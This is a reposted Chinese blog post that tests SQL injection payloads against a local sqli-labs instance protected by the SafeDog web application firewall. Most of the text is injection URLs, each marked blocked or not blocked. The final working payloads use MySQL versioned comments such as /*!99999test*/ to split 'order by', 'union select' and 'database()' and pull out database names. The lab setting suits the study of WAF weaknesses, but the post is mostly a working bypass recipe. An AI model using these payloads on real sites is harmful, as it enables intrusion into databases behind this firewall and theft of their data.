Mysql注入绕过安全狗

转载请加原文链接：https://www.cnblogs.com/Yang34/p/12055052.html

微信公众号：信Yang安全。同步更新，欢迎关注。文末有二维码。

正好最近在搞注入，昨天现装的安全狗练练手，搭建环境如下图：

拦截日志如下：

过产品第一步想法是确定哪些会被拦截，哪些不会被拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1%27order 1’ order 不拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1%27%20order%20by%201

1’ order by 1 拦截

1’ order by 1 --+ 拦截

综上，基本确定order by连用会被拦截 第一步尝试绕过orderby的拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1' order/*!by*/ 1 --+ 不拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1'order /*!by*/ 4 --+ 不拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1' order/*!10000by*/ 1 --+ 不拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1' order /*!99999*/by4 --+ 不拦截

http://192.168.35.132/sqlilabs/Less-1/?id=1’ order/*!99999test*/by%204--+不拦截

Order by处几种绕过

http://192.168.35.132/sqlilabs/Less-1/?id=1' order/*!by*/ 4 --+

http://192.168.35.132/sqlilabs/Less-1/?id=1' order/*!10000by*/ 1 --+

http://192.168.35.132/sqlilabs/Less-1/?id=1' order /*!99999*/by4 --+

http://192.168.35.132/sqlilabs/Less-1/?id=1’ order/*!99999test*/by%204--+

接下来尝试union select

http://192.168.35.132/sqlilabs/Less-1/?id=-1 union 不拦截单纯的一个union是不会触发的

http://192.168.35.132/sqlilabs/Less-1/?id=-1%27%20union%20select%20--+拦截

确定union select在一起会拦截

结合之前绕过的payload 想办法把他们分开

http://192.168.35.132/sqlilabs/Less-1/?id=-1' union/*!select*/ 1,2,3 --+  拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1' union/*!10000select*/ 1,2,3 --+  拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1' union/*!99999*/select 1,2,3 --+  拦截

尝试加起其他东西进去再加一组符号
http://192.168.35.132/sqlilabs/Less-1/?id=-1' union/*!99999/*!*/*/select 1,2,3--+ 拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999/*!99999*/*/select 1,2,3 --+ 拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!test99999*/select 1,2,3 --+  不拦截但是报错了

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,2,3 --+ 成功看来得把字母加载后面

尝试从成功的这个入手

http://192.168.35.132/sqlilabs/Less-1/?id=-1’union/*!99999test*/select 1,database(),3 --+ 拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,/*!99999test*/database(),3 --+  拦截  基本判断database被拦截了

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,/*!99999database*/(),3 --+  拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,/*!99999database()*/,3 --+  拦截

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,database/*!99999test*/(),3 --+ 成功显示

http://192.168.35.132/sqlilabs/Less-1/?id=-1'union/*!99999test*/select 1,database(/*!99999test*/),3 --+ 成功显示

 

http://192.168.35.132/sqlilabs/Less-1/?id=-1%27%20union/*!99999test*/select%201,database/*!(*/),3%20--+成功显示

 

欢迎关注个人微信公众号：